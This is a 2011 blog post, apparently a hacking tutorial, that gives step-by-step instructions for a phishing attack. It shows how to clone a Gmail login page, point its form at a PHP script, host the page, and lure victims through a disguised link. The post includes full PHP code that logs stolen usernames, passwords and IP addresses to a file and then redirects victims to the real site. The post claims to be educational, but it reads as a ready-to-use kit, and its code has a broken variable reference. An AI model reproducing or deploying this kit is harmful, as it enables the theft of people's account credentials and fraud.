Thursday, March 17, 2011

Phishing through fake login page

Before I begin, this is only an educational tutorial. Stealing others' personal information is legally and morally wrong. So just have fun with it, play pranks with your friends and don't do anything that you might regret later.

Phishing is one of the oldest and perhaps the easiest way to hack someone's personal page or E-Mail account. It simply makes the target believe that the login page they are entering their userid and password is real, but sends their login info to the phisher. Wrong but useful.
So to do this just follow the streps
1) Open any site (e.g.- Google, Yahoo, Facebook, Twitter, etc) and go to their login page.

2) Right Click anywhere on the login page and click on Save As..... Give the file a name like gmail.html (.html is important)

3) Open the gmail.html file in say Notebook or any HTML editor. Find the form tag
Here is the one from gmail


(Different sites have different codes, but the form tag remains the same)

4) The important part in this code is actually the action. We have to change the action which is pointing to Google to your phishing script.
So we change action="https://www.google.com/accounts/ServiceLoginAuth"
to action="https://www.yoursite.com/anyfolder/phish.php"

5) Open Notepad, copy and paste the following code
<?php
// Phisher v1.0
// Created by Tanmay Das

$userid = $_POST['Email'];
$pass = $_POST['Passwd'];


if(!file_exists("dbase.txt"))
{
$newphish = "dbase.txt";
$newphishHandle = fopen($newphish, 'w');
fclose($newphishHandle);
}

$phish = "dbase.txt";
$info = file($phish);

$today = date("l, F j, Y, g:i a");
$ipadd = getenv("REMOTE_ADDR");
$reff = getenv("HTTP_REFERER");

$insertdata = $today."||".$ipadd."||".$reff."||".$userid."||".$pass."\n";
$fp = fopen($dbase, "a");
fputs($fp, $insertdata);
fclose($fp);

echo '<script type="text/javascript">';
echo 'window.location = "https://www.google.com/accounts/ServiceLogin?hl=en&continue=http://www.google.co.in/"';
echo '</script>';
?>
Save it as phish.php

5) Save the file along with phish.php and upload it on your server or any free server like 110mb.com.
Send your friend an E-mail containing the link to this page. Remember to change the text of the link to something like https://www.google.com/accounts/ServiceLogin?hl=en&continue=http://www.google.co.in/"

6) When they would open the link and enter their  userid and password. The script will look for dbase.txt. If not found then a new file will be created on your server. Just download dbase.txt when you have lots of userids and passwords.

Note again Let me be clear. This is just a tutorial for knowledge purpose. Phishing is a legal offence punishable by law. If you are caught stealing someone's data then I am in no way responsible for your actions.

No comments:

Post a Comment